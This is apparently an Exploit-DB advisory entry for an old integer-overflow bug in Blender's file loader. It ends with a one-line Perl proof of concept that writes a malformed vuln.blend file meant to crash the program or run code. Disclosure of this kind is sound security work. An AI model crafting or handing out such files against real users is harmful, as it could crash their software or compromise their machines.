Blender BlenLoader 2.x - File Processing Integer Overflow

EDB-ID:

26915

CVE:

N/A


Author:

Damian Put

Type:

dos


Platform:

Linux

Date:

2005-12-20


source: https://www.securityfocus.com/bid/15981/info

Blender is susceptible to an integer-overflow vulnerability. This issue is due to the application's failure to properly sanitize user-supplied input before using it in a memory allocation and copy operation.

This issue allows attackers to execute arbitrary machine code in the context of the user running the affected application. 

perl -e 'print "BLENDER_v273"; print "\xf0\xff\xff\xff"x10' > vuln.blend